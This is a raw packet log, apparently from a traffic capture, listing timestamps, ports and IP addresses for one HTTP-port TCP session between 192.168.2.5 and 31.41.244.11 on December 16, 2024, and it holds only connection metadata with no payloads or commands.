Dec 16, 2024 11:03:22.632698059 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.632705927 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.632754087 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.633765936 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.633804083 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.633819103 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.633847952 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.634800911 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.634852886 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.634912968 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.634964943 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.636118889 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.636157036 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.636172056 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.636198997 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.637120008 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.637168884 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.637185097 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.637229919 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.638324022 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.638340950 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.638371944 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.638385057 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.639399052 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.639462948 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.639472008 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.639509916 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.640556097 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.640604973 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.640654087 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.640706062 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.641711950 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.641758919 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.641804934 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.641848087 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.642932892 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.642961025 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.642981052 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.642996073 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.644120932 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.644170046 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.644256115 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.644308090 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.645203114 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.645245075 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.645284891 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.645328999 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.646300077 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.646348000 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.646419048 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.646466017 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.647507906 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.647550106 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.647577047 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.647623062 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.648725033 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.648773909 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.648859978 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.648909092 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.649861097 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.649905920 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.649931908 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.649976015 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.650966883 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.651015997 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.651102066 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.651149035 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.652143002 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.652190924 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.652286053 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.652329922 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.653352976 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.653412104 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.653422117 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.653465986 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.654495001 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.654537916 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.654584885 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.654629946 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.655611992 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.655646086 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.655736923 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.655782938 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.656855106 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.656903028 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.656943083 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.656989098 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.657990932 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.658041000 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.658174992 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.658227921 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.659092903 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.659142971 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.659291983 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.659338951 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.660305023 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.660341978 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.660353899 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.660386086 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.661549091 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.661602974 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.661638975 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.661684036 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.662594080 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.662630081 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.662652969 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.662669897 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.663871050 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.663918972 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.663927078 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.663975954 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.664876938 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.664930105 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.664943933 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.664972067 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.666146994 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.666197062 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.666316986 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.666367054 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.667243004 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.667279959 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.667296886 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.667325974 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.668339968 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.668390036 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.668462038 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.668509960 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.669536114 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.669584990 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.669652939 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.669702053 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.670790911 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.670840979 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.670849085 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.670898914 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.671896935 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.671931982 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.671947002 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.671983957 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.672933102 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.672982931 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.673043966 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.673094034 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.674192905 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.674226999 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.674243927 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.674269915 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.675342083 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.675391912 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.675400019 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.675450087 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.676451921 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.676498890 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.676640987 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.676691055 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.677701950 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.677737951 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.677752972 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.677783966 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.678742886 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.678792953 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.679168940 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.679219007 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.679946899 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.679996967 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.680279970 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.680329084 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.681204081 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.681253910 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.681402922 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.681453943 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.682214975 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.682264090 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.682271004 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.682307959 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.683341980 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.683397055 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.683449984 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.683505058 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.684652090 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.684686899 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.684705973 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.684721947 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.685656071 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.685707092 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.685789108 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.685836077 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.686913967 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.686947107 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.686965942 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.686990976 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.687999964 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.688060045 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.688119888 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.688174009 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.689302921 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.689362049 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.820683002 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.820749044 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.820770025 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.820823908 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.821465969 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.821520090 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.821578026 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.821636915 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.822515965 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.822571993 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.822583914 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.822635889 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.823702097 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.823748112 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.823827028 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.823913097 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.824845076 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.824882030 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.824898958 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.824933052 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.825911999 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.825967073 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.825969934 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.826013088 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.827089071 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.827203035 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.827202082 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.827251911 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.828207970 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.828259945 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.828331947 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.828381062 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.829364061 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.829418898 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.829500914 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.829551935 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.830530882 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.830583096 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.830651999 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.830701113 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.831706047 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.831758022 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.831788063 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.831834078 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.832798958 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.832851887 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.833048105 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.833096981 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.834012032 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.834057093 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.834070921 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.834116936 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.835104942 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.835159063 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.835283041 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.835330963 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.836319923 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.836371899 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.836376905 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.836425066 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.837409973 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.837460995 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.837527037 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.837584972 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.838692904 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.838727951 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.838745117 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.838773012 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.839791059 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.839843988 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.839967966 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.840015888 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.840867043 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.840923071 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.841006994 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.841058969 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.842097998 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.842156887 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.842199087 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.842246056 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.843223095 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.843276024 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.843374968 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.843422890 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.844410896 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.844446898 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.844455957 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.844495058 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.845518112 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.845573902 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.845701933 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.845752954 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.846645117 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.846693993 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.846787930 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.846837997 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.847843885 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.847893953 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.848025084 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.848069906 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.848963976 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.849014997 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.849095106 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.849145889 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.850099087 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.850152016 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.850241899 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.850295067 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.851274967 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.851326942 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.851457119 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.851511002 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.852466106 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.852524996 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.852596045 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.852657080 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.853641033 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.853689909 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.853696108 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.853745937 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.854794025 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.854842901 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.854904890 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.854954958 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.855986118 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.856034040 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.856040955 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.856086969 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.857139111 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.857175112 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.857188940 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.857228041 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.858309031 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.858344078 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.858362913 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.858390093 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.859496117 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.859546900 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.859592915 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.859642029 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.860610962 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:22.860662937 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:22.860701084 CET	80	49800	31.41.244.11	192.168.2.5
